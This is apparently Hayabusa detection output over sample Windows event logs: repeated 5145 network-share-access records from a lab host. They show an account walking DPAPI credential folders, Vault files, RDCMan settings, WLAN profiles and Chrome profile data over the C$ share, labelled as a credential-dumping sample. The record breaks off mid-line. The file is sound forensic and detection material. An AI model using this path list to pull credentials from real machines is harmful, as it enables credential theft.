0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:11.940 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network 
share.evtx +2021-12-12 11:53:11.956 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.568 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.568 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.568 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.584 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user 
file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.601 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.616 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.616 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.616 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.631 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 
11:53:14.647 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.663 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.666 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.666 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.666 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.682 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.682 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:14.718 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.562 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.577 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.593 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.593 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.608 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.608 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.624 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.624 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.640 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.642 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 
11:53:15.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.658 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.673 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.689 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 
0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.689 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 11:53:15.689 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 